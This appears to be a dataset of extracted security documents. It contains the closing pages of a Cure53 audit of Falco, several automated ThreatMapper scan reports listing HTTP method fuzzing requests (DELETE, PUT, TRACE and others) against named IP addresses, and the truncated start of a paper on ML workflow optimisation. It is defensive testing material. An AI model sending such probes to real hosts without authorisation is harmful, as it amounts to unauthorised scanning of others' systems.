10709 Berlin\n cure53.de \u00b7 mario@cure53.de \nSysdig Security Flags:\ngdb-peda$ checksec\nCANARY : ENABLED\nFORTIFY : ENABLED\nNX : ENABLED\nPIE : ENABLED\nRELRO : Full\nCure53, Berlin \u00b7 07/24/19 11/13 Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14 \n D 10709 Berlin\n cure53.de \u00b7 mario@cure53.de \nConclusions\nJudging by the relatively low amount of relevant vulnerabilities and only a handful of\nmiscellaneous issues, Cure53 has gained a good impression of the examined Falco\nsoftware complex and the underlying open-source variant of Sysdig. Even though one of\nthe issues was classified as being \u201c Critical\u201d in terms of severity, this summer 2019\nproject demonstrates that the Falco software generally keeps its security promises.\nCure53 confirms that Falco already constitutes a mature security solution for container\nruntimes. The problems documented as a result of this June and July 2019 assessment\nmay be rectified with relatively low effort and certainly within a minimal timeframe.\nImportantly, the involved members of the development team were engaged in the\nauditing process, despite an initial delay at the start of the project. The individual\nturnaround times for answering questions were quite impressive and the provided\nfeedback was clear.\nAs regards technical details, especially the undetected crash is worrisome because it\ndisables all of the Falco\u2019s monitoring. This lowers the integrity of the security promise the\nsystem intends on keeping. The current implementation of the filter-rules may need to be\nreworked. Perhaps some revisions are also needed in connection with the architecture\nof certain design aspects as the current strategies do not prevent a multitude of possible\nrule-bypasses. Other user-space issues could be grouped together under the heading of\nsimple implementation oversights that appear difficult to fully exploit. It is still\nrecommended that the development team looks for issues similar to the ones identified\nhere. These efforts should be more comprehensive to make sure that problems are\nprevented across the board in a consistent manner. As usual at this point, it is\nrecommended to treat all relevant dependencies with the same scrutiny.\nIt needs to be reiterated that this security-focused audit of the Falco security system was\ngenerously funded by The Linux Foundation / Cloud Native Computing Foundation. The\nresources allowed a team of six Cure53 testers to scrutinize the software for a total of\neighteen person-days. The project itself ignited the interest of the developers linked to\nthe underlying Sysdig system and they gladly jumped on the opportunity to join this\nassessment. As a result, the counterpart team at Sysdig initiated a corresponding audit\nof the open-source edition of Sysdig. The combined scope of both investigations made it\npossible for a very good coverage of the integrated software complex to be reached.\nCure53 attests good general health and security of the project and this will especially\nhold once the \u201cCritical\u201d issue gets mitigated. The testers are further hoping that all\nremaining issues will be fixed swiftly.\nThe overall indicators pertaining to the security of the Falco monitoring system, which\nwere established and evaluated during this summer 2019 Cure53 assessment, testify to\nCure53, Berlin \u00b7 07/24/19 12/13 Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14 \n D 10709 Berlin\n cure53.de \u00b7 mario@cure53.de \nthe project being in good shape from a security stance. The code reads well and seems\nto be maintainable without major effort. The choice of the implementation language and\nthe dependent components leaves room for some errors, yet these represent typical\nflaws of many of the contemporary software systems. The documentation appears\ncomplete and the examined aspects exhibit good quality when it comes to security of the\naudited software system. To sum up, the general status of the Falco system is deemed\nstable and correct with only few aspects calling for more attention.\nCure53 would like to thank Michael Ducy, Mark Stemm, Leonardo Di Donato and\nLorenzo Fontana from the Falco development team, as well as Chris Aniszczyk of The\nLinux Foundation, for their excellent project coordination, support and assistance, both\nbefore and during this assignment. Special gratitude also needs to be extended to The\nLinux Foundation for sponsoring this project.\nCure53, Berlin \u00b7 07/24/19 13/13" - } - ] - }, - { - "tag": { - "category": "Provisioning", - "subcategory": "Security & Compliance", - "project_name": "ThreatMapper", - "file_name": "Security Report for Security Test 1 2022-08-04 21_43_48.pdf" - }, - "content": [ - { - "data": "Issues report for Security Test 1\nin Project 3/Security Test Suite 1/https://137.184.10.129 TestCase\nSummary\nStarted at 2022-08-04 21:43:48\nTime taken 00:00:11.348\nTotal scans performed: 62\nIssues found: 12\nScan Issues Found In Test StepsTotal Issues \nFound\nHTTP Method \nFuzzingPOST 12 12\nDetailed Info\nIssues are grouped by Security scan.\nHTTP Method Fuzzing\nAn HTTP Method Fuzzing Scan attempts to use other HTTP verbs (methods) than those defined in \nan API. For instance, if you have defined GET and POST, it will send requests using the DELETE \nand PUT verbs, expecting an appropriate HTTP error response and reporting alerts if it doesn't \nreceive it.\nSometimes, unexpected HTTP verbs can overwrite data on a server or get data that shouldn't be \nrevealed to clients.\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://137.184.10.129/\nRequest PURGE https://137.184.10.129/ HTTP/1.1\nTest Step POST\nModified \nParametersName Value\nmethod PURGE\nResponseContent-type: text/html; charset=utf-8\n141 Content length: \nFull response:<!DOCTYPE html> <html lang=\"en\"> <head> <meta charset=\"utf-8\"> <title>\nError</title> </head> <body> <pre>Cannot PURGE /</pre> </body> </html>\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.PURGE\nIssue Number #1\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://137.184.10.129/\nRequest COPY https://137.184.10.129/ HTTP/1.1\nTest Step POST\nModified \nParametersName Value\nmethod COPY\nResponseContent-type: text/html; charset=utf-8\n140 Content length: \nFull response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <meta charset=\"utf-8\"> <title>\nError</title> </head> <body> <pre>Cannot COPY /</pre> </body> </html>\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.COPY\nIssue Number #2\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://137.184.10.129/\nRequest UNLOCK https://137.184.10.129/ HTTP/1.1\nTest Step POST\nModified \nParametersName Value\nmethod UNLOCK\nResponseContent-type: text/html; charset=utf-8\n142 Content length: \nFull response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <meta charset=\"utf-8\"> <title>\nError</title> </head> <body> <pre>Cannot UNLOCK /</pre> </body> </html>\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource. UNLOCK\nIssue Number #3\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://137.184.10.129/\nRequest LOCK https://137.184.10.129/ HTTP/1.1Test Step POST\nModified \nParametersName Value\nmethod LOCK\nResponseContent-type: text/html; charset=utf-8\n140 Content length: \nFull response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <meta charset=\"utf-8\"> <title>\nError</title> </head> <body> <pre>Cannot LOCK /</pre> </body> </html>\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.LOCK\nIssue Number #4\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://137.184.10.129/\nRequest PROPFIND https://137.184.10.129/ HTTP/1.1\nTest Step POST\nModified \nParametersName Value\nmethod PROPFIND\nResponseContent-type: text/html; charset=utf-8\n144 Content length: \nFull response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <meta charset=\"utf-8\"> <title>\nError</title> </head> <body> <pre>Cannot PROPFIND /</pre> </body> </html>\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource. PROPFIND\nIssue Number #5\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://137.184.10.129/\nRequest PATCH https://137.184.10.129/ HTTP/1.1\nTest Step POST\nModified \nParametersName Value\nmethod PATCH\nResponseContent-type: text/html; charset=utf-8\n141 Content length: \nFull response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <meta charset=\"utf-8\"> <title>\nError</title> </head> <body> <pre>Cannot PATCH /</pre> </body> </html>\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.PATCH\nIssue Number #6Scan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://137.184.10.129/\nRequest TRACE https://137.184.10.129/ HTTP/1.1\nTest Step POST\nModified \nParametersName Value\nmethod TRACE\nResponseContent-type: text/html; charset=utf-8\n141 Content length: \nFull response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <meta charset=\"utf-8\"> <title>\nError</title> </head> <body> <pre>Cannot TRACE /</pre> </body> </html>\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.TRACE\nIssue Number #7\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://137.184.10.129/\nRequest OPTIONS https://137.184.10.129/ HTTP/1.1\nTest Step POST\nModified \nParametersName Value\nmethod OPTIONS\nResponseContent-type: text/plain\n2 Content length: \nFull response:\nok\nAlerts Valid HTTP Status Codes: Response status code: 200 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource. OPTIONS\nIssue Number #8\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://137.184.10.129/\nRequest HEAD https://137.184.10.129/ HTTP/1.1\nTest Step POST\nModified \nParametersName Value\nmethod HEAD\nResponse No contentAlerts Valid HTTP Status Codes: Response status code: 200 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.HEAD\nIssue Number #9\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://137.184.10.129/\nRequest DELETE https://137.184.10.129/ HTTP/1.1\nTest Step POST\nModified \nParametersName Value\nmethod DELETE\nResponseContent-type: text/html; charset=utf-8\n142 Content length: \nFull response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <meta charset=\"utf-8\"> <title>\nError</title> </head> <body> <pre>Cannot DELETE /</pre> </body> </html>\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource. DELETE\nIssue Number #10\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://137.184.10.129/\nRequest PUT https://137.184.10.129/ HTTP/1.1\nTest Step POST\nModified \nParametersName Value\nmethod PUT\nResponseContent-type: text/html; charset=utf-8\n139 Content length: \nFull response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <meta charset=\"utf-8\"> <title>\nError</title> </head> <body> <pre>Cannot PUT /</pre> </body> </html>\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.PUT\nIssue Number #11\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://137.184.10.129/\nRequest GET https://137.184.10.129/ HTTP/1.1\nTest Step POSTModified \nParametersName Value\nmethod GET\nResponseContent-type: text/html; charset=UTF-8\n21623 Content length: \nResponse is too big. Beginning of the response:\n<!doctype html><html lang=\"en\"><head><title>Deepfence</title><meta charset\n=\"utf-8\"/><meta name=\"viewport\" content=\"width=device-width,initial-scale=\n1,shrink-to-fit=no\"/><script>window.__DF_CSRF_TOKEN = '$__\nCSRF_TOKEN_PLACEHOLDER__';</script><script src=\"env-config.js\"></script><\nlink rel=\"shortcut icon\" href=\"data:image/x-icon;base64,\nAAABAAMAEBAAAAEAIABoBAAANgAAACAgAAABACAAKBEAAJ4EAAAwMAAAAQAgAGgmAADGFQAAKA\nAAABAAAAAgAAAAAQAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAACvcho6sXAbQgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAtHMcubNyHcEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAuHYaOrd5Hf64eR3+\nuHkbQQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAALx+\nG7m9fx3/vX8d/7x+\nG8EAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMGDGjrAhBz+\nwIMbycGDHMfBhBz+\nw4MZPAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADFiRq5xYoc/\n8OIGlbEihvpxYob9caJGTIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADKkRU\n6yZAb/smPGsrLkBl2ypAb/8...\nAlerts Valid HTTP Status Codes: Response status code: 200 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.GET\nIssue Number #12" - } - ] - }, - { - "tag": { - "category": "Provisioning", - "subcategory": "Security & Compliance", - "project_name": "ThreatMapper", - "file_name": "Security Report for Security Test 1 2021-04-14 18_27_51.pdf" - }, - "content": [ - { - "data": "Issues report for Security Test 1\nin Project 3/Security Test Suite 1/https://164.90.157.161 TestCase\nSummary\nStarted at 2021-04-14 18:27:51\nTime taken 00:00:08.396\nTotal scans performed: 62\nIssues found: 12\nScan Issues Found In Test StepsTotal Issues \nFound\nHTTP Method \nFuzzingPOST 12 12\nDetailed Info\nIssues are grouped by Security scan.\nHTTP Method Fuzzing\nAn HTTP Method Fuzzing Scan attempts to use other HTTP verbs (methods) than those defined in \nan API. For instance, if you have defined GET and POST, it will send requests using the DELETE \nand PUT verbs, expecting an appropriate HTTP error response and reporting alerts if it doesn't \nreceive it.\nSometimes, unexpected HTTP verbs can overwrite data on a server or get data that shouldn't be \nrevealed to clients.\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://164.90.157.161/\nRequest PURGE https://164.90.157.161/ HTTP/1.1\nTest Step POST\nModified \nParametersName Value\nmethod PURGE\nResponseContent-type: text/html; charset=utf-8\n141 Content length: \nFull response:<!DOCTYPE html> <html lang=\"en\"> <head> <meta charset=\"utf-8\"> <title>\nError</title> </head> <body> <pre>Cannot PURGE /</pre> </body> </html>\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.PURGE\nIssue Number #1\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://164.90.157.161/\nRequest COPY https://164.90.157.161/ HTTP/1.1\nTest Step POST\nModified \nParametersName Value\nmethod COPY\nResponseContent-type: text/html; charset=utf-8\n140 Content length: \nFull response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <meta charset=\"utf-8\"> <title>\nError</title> </head> <body> <pre>Cannot COPY /</pre> </body> </html>\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.COPY\nIssue Number #2\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://164.90.157.161/\nRequest UNLOCK https://164.90.157.161/ HTTP/1.1\nTest Step POST\nModified \nParametersName Value\nmethod UNLOCK\nResponseContent-type: text/html; charset=utf-8\n142 Content length: \nFull response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <meta charset=\"utf-8\"> <title>\nError</title> </head> <body> <pre>Cannot UNLOCK /</pre> </body> </html>\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource. UNLOCK\nIssue Number #3\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://164.90.157.161/\nRequest LOCK https://164.90.157.161/ HTTP/1.1Test Step POST\nModified \nParametersName Value\nmethod LOCK\nResponseContent-type: text/html; charset=utf-8\n140 Content length: \nFull response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <meta charset=\"utf-8\"> <title>\nError</title> </head> <body> <pre>Cannot LOCK /</pre> </body> </html>\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.LOCK\nIssue Number #4\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://164.90.157.161/\nRequest PROPFIND https://164.90.157.161/ HTTP/1.1\nTest Step POST\nModified \nParametersName Value\nmethod PROPFIND\nResponseContent-type: text/html; charset=utf-8\n144 Content length: \nFull response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <meta charset=\"utf-8\"> <title>\nError</title> </head> <body> <pre>Cannot PROPFIND /</pre> </body> </html>\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource. PROPFIND\nIssue Number #5\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://164.90.157.161/\nRequest PATCH https://164.90.157.161/ HTTP/1.1\nTest Step POST\nModified \nParametersName Value\nmethod PATCH\nResponseContent-type: text/html; charset=utf-8\n141 Content length: \nFull response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <meta charset=\"utf-8\"> <title>\nError</title> </head> <body> <pre>Cannot PATCH /</pre> </body> </html>\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.PATCH\nIssue Number #6Scan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://164.90.157.161/\nRequest TRACE https://164.90.157.161/ HTTP/1.1\nTest Step POST\nModified \nParametersName Value\nmethod TRACE\nResponseContent-type: text/html; charset=utf-8\n141 Content length: \nFull response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <meta charset=\"utf-8\"> <title>\nError</title> </head> <body> <pre>Cannot TRACE /</pre> </body> </html>\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.TRACE\nIssue Number #7\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://164.90.157.161/\nRequest OPTIONS https://164.90.157.161/ HTTP/1.1\nTest Step POST\nModified \nParametersName Value\nmethod OPTIONS\nResponseContent-type: text/plain\n2 Content length: \nFull response:\nok\nAlerts Valid HTTP Status Codes: Response status code: 200 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource. OPTIONS\nIssue Number #8\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://164.90.157.161/\nRequest HEAD https://164.90.157.161/ HTTP/1.1\nTest Step POST\nModified \nParametersName Value\nmethod HEAD\nResponse No contentAlerts Valid HTTP Status Codes: Response status code: 200 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.HEAD\nIssue Number #9\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://164.90.157.161/\nRequest DELETE https://164.90.157.161/ HTTP/1.1\nTest Step POST\nModified \nParametersName Value\nmethod DELETE\nResponseContent-type: text/html; charset=utf-8\n142 Content length: \nFull response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <meta charset=\"utf-8\"> <title>\nError</title> </head> <body> <pre>Cannot DELETE /</pre> </body> </html>\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource. DELETE\nIssue Number #10\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://164.90.157.161/\nRequest PUT https://164.90.157.161/ HTTP/1.1\nTest Step POST\nModified \nParametersName Value\nmethod PUT\nResponseContent-type: text/html; charset=utf-8\n139 Content length: \nFull response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <meta charset=\"utf-8\"> <title>\nError</title> </head> <body> <pre>Cannot PUT /</pre> </body> </html>\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.PUT\nIssue Number #11\nScan HTTP Method Fuzzing\nSeverity ERROR\nEndpoint https://164.90.157.161/\nRequest GET https://164.90.157.161/ HTTP/1.1\nTest Step POSTModified \nParametersName Value\nmethod GET\nResponseContent-type: text/html; charset=UTF-8\n7322 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script language=\"\njavascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER__\"; </\nscript> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93DyYhHdVef+\n9c4eHxBYe+qWBLxr58e19sX7bkj10q+eDTloGQsDUTh6iOsKNDh8NTNTg5XYHN7Sb...\nAlerts\nSensitive Information Exposure: [Version x.y.z] Exposing version numbers gives \nunnecessary hints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+\n.*] found [3/3.5.16]\nValid HTTP Status Codes: Response status code: 200 is not in acceptable list of \nstatus codes\nAction Points You should check if the HTTP method should really be allowed for this resource.GET\nIssue Number #12" - } - ] - }, - { - "tag": { - "category": "Provisioning", - "subcategory": "Security & Compliance", - "project_name": "ThreatMapper", - "file_name": "Security Report for Security Test 1 2021-04-19 15_48_09.pdf" - }, - "content": [ - { - "data": "Issues report for Security Test 1\nin REST Project 3/https://164.90.157.161 Test Suite/https://164.90.157.161 Test Case 1\nSummary\nStarted at 2021-04-19 15:48:09\nTime taken 00:00:28.514\nTotal scans performed: 209\nIssues found: 2\nScan Issues Found In Test StepsTotal Issues \nFound\nHTTP Method \nFuzzingRequest 1 2 2\nDetailed Info\nIssues are grouped by Security scan.\nHTTP Method Fuzzing\nAn HTTP Method Fuzzing Scan attempts to use other HTTP verbs (methods) than those defined in \nan API. For instance, if you have defined GET and POST, it will send requests using the DELETE \nand PUT verbs, expecting an appropriate HTTP error response and reporting alerts if it doesn't \nreceive it.\nSometimes, unexpected HTTP verbs can overwrite data on a server or get data that shouldn't be \nrevealed to clients.\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://164.90.157.161/deepfence/v1.5/scope\nRequest OPTIONS https://164.90.157.161/deepfence/v1.5/scope HTTP/1.1\nTest Step Request 1\nModified \nParametersName Value\nmethod OPTIONS\nResponseContent-type: text/plain\n2 Content length: \nFull response:\nok\nAlerts Valid HTTP Status Codes: Response status code: 200 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource. OPTIONS\nIssue Number #1\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://164.90.157.161/deepfence/v1.5/scope\nRequest HEAD https://164.90.157.161/deepfence/v1.5/scope HTTP/1.1\nTest Step Request 1\nModified \nParametersName Value\nmethod HEAD\nResponse No content\nAlerts Valid HTTP Status Codes: Response status code: 200 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.HEAD\nIssue Number #2" - } - ] - }, - { - "tag": { - "category": "Provisioning", - "subcategory": "Automation & Configuration", - "project_name": "Couler", - "file_name": "Tech-Report-of-Couler-Unified-Machine-Learning-Workflow-Optimization-in-Cloud.pdf" - }, - "content": [ - { - "data": "Couler: Unified Machine Learning Workflow\nOptimization in Cloud\nXiaoda Wang\u00a7, Yuan Tang\u2020, Tengda Guo\u00a7, Bo Sang\u2217\nJingji Wu\u2217, Jian Sha\u2217, Ke Zhang\u2217, Jiang Qian\u2225, Mingjie Tang\u00a7\n\u2217Ant Group\u2020Red Hat, Inc.\u2225Snap, Inc\u00a7Sichuan University\n{wangxiaoda, guotengda }@stu.scu.edu.cn, {tangrock, terrytangyuan }@gmail.com,\n{b.sang, jingji.wjw, shajian, yingzi.zk }@antgroup.com\nAbstract \u2014Machine Learning (ML) has become ubiquitous,\nfueling data-driven applications across various organizations.\nContrary to the traditional perception of ML in research,\nML workflows can be complex, resource-intensive, and time-\nconsuming. Expanding an ML workflow to encompass a wider\nrange of data infrastructure and data types may lead to larger\nworkloads and increased deployment costs. Currently, numerous\nworkflow engines are available (with over ten being widely\nrecognized). This variety poses a challenge for end-users in terms\nof mastering different engine APIs. While efforts have primarily\nfocused on optimizing ML Operations (MLOps) for a specific\nworkflow engine, current methods largely overlook workflow\noptimization across different engines.\nIn this work, we design and implement COULER , a system\ndesigned for unified ML workflow optimization in the cloud.\nOur main insight lies in the ability to generate an ML work-\nflow using natural language (NL) descriptions. We integrate\nLarge Language Models (LLMs) into workflow generation, and\nprovide a unified programming interface for various workflow\nengines. This approach alleviates the need to understand various\nworkflow engines\u2019 APIs. Moreover, COULER enhances workflow\ncomputation efficiency by introducing automated caching at\nmultiple stages, enabling large workflow auto-parallelization and\nautomatic hyperparameters tuning. These enhancements mini-\nmize redundant computational costs and improve fault tolerance\nduring deep learning workflow training. COULER is extensively\ndeployed in real-world production scenarios at ANTGROUP ,\nhandling approximately 22k workflows daily, and has successfully\nimproved the CPU/Memory utilization by more than 15% and\nthe workflow completion rate by around 17%.\nIndex Terms \u2014Machine Learning Workflow, LLM, Cloud\nI. I NTRODUCTION\nA workflow, commonly known as a data pipeline, entails a\nsequence of steps that process raw data from various sources,\ndirecting it to a destination for both storage and analysis. Simi-\nlarly, an ML workflow streamlines the comprehensive MLOps\nworkflow, spanning data acquisition, exploratory data analysis\n(EDA), data augmentation, model creation, and deployment.\nPost-deployment, this ML workflow facilitates reproducibility,\ntracking, and monitoring. Such workflows enhance the effi-\nciency and management of the entire model lifecycle, leading\nto accelerated usability and streamlined deployment [27], [42].\nTo automate and oversee these workflows, ML orchestration\ntools are deployed, offering an intuitive and collaborative\ninterface.\nMingjie Tang, Yuan Tang, and Qian Jiang performed most of this work\nwhile at Ant Group.\nWorkflow Definition\nDeveloper\nEngines\nProgramming API \nWorkflowWorkflow Optimization\nDataLSTM\nGRU\nSVMPre LSTM Eval ...\nRepo\nHyperparameters\nOptimizationWorkflow \nParallelismPreData Caching3\n2 1Fig. 1: An example of a financial company\u2019s journey in\nleveraging machine learning to predict market trends.\nExample. Refer to the example in Figure 1, a financial com-\npany aims to predict market trends using ML models. Initially,\ndevelopers are tasked with selecting a workflow engine from\na variety of available options, such as Argo, Airflow, Dolphin\nScheduler, MetaFlow or Kubeflow Pipeline etc. Then, end\nusers need to dedicate time to mastering the programming API\nof specific workflow engines. Upon defining the workflow, the\nfirst step entails data preprocessing. Subsequently, three mod-\nels are evaluated, and the most promising model, LSTM, is\nselected for further analysis. The preprocessed data is reloaded\nfor subsequent analysis, culminating in the generation of a\npredictive report through a complex process. To implement\nthis, the following challenges must be addressed:\n\u2022How can a workflow description be automatically trans-\nlated to an ML workflow? For execution, developers\nmust code the workflow to be compatible with different\nworkflow engines. However, the guidelines for different\nworkflow engines can vary significantly, posing a chal-\nlenge to become proficient in all of them.\n\u2022How can the built workflow be effectively optimized?\nGiven a well-defined workflow, optimization is crucial.\nDevelopers need to find the optimal hyperparameters for\ntraining the ML models, and manage workflow paral-\nlelism manually. In the absence of caching, both the data\nloader and intermediate results become critical points,\npotentially slowing down the process.\nGoals and challenges. Given the ML workflow description\nand available resources, our objective is to autonomously con-struct a workflow that reduces dependence on expert knowl-\nedge. Simultaneously, we aim to enhance overall efficiency by\nminimizing end-to-end workflow execution costs. We strive\nto streamline the ML workflow creation process and ensure\noptimal utilization of available resources, making the entire\nsystem more user-friendly and efficient.\nEffectively orchestrating workflows is crucial for companies\nheavily invested in machine learning. Consequently, a devel-\noper needs to understand the programming API of the selected\nworkflow engine and learn to automate and optimize the entire\nworkflow manually. Numerous widely used workflow engines\nexist, such as Argo Workflows [5], Tekton Pipelines [44], and\nApache Airflow [2]. The necessity to master multiple workflow\nengines presents a significant challenge for developers due\nto the unique programming interface of each engine. With\nthe advent of LLMs, significant strides has been made in the\nrealms of natural language to SQL conversion [15], [37], [43],\ncode generation from natural language descriptions [30], [54]\nand database performance tuning [24]. This advancement facil-\nitates the efficient conversion of natural language descriptions\ninto programming coding across different workflow engines,\nthereby simplifying the workflow definition process. However,\nseveral challenges remain:\nGiven the myriad of available workflow engines, attempting\na direct translation from NL to various workflow engine codes\nproves to be intricate and inefficient. Factors such as the\ncontinual evolution of workflow engine APIs and the distinct\ndesign philosophy behind each engine contribute to this com-\nplexity. Additionally, LLMs may not always stay updated with\nthe latest changes in these APIs, posing a challenge to ensure\naccurate NL to code translation consistently. This scenario\naccentuates the need for a unified coding interface catering\nto different workflow engines. Such an interface simplifies\nthe process of defining and managing workflows without\ndelving into the intricacies of each engine, thereby enhancing\nthe efficiency of LLMs in translating NL descriptions into\nexecutable code.\nAfter establishing a workflow, optimizing its computational\naspects is crucial. One challenge is to effectively cache in-\ntermediate results dynamically, maximizing resource use and\nminimizing runtime. Storing crucial intermediary outputs al-\nlows workflows to gracefully handle runtime errors without the\nneed to restart from scratch. Moreover, splitting large work-\nflows into smaller, more manageable segments is not straight-\nforward. It demands careful strategizing to strike a balance\nbetween performance and resource use. In ML workflows,\nhyperparameter optimization of the models introduces another\nlayer of complexity. Identifying the optimal hyperparameter\nvalues is a complex process, and leveraging the capabilities\nof LLMs to automate this process, while promising, remains\na significant challenge.\nContributions. To address these challenges, the contributions\nof this work are outlined below:\n\u2022Simplicity and Extensibility : We provide a unified pro-\ngramming interface for workflow definition, ensuring inde-\npendence from the workflow engine and compatibility withvarious workflow engines such as Argo Workflows, Airflow,\nand Tekton. We demonstrate how C OULER supports ML\nmodel selection and AutoML pipelines.\n\u2022Automation : We integrate 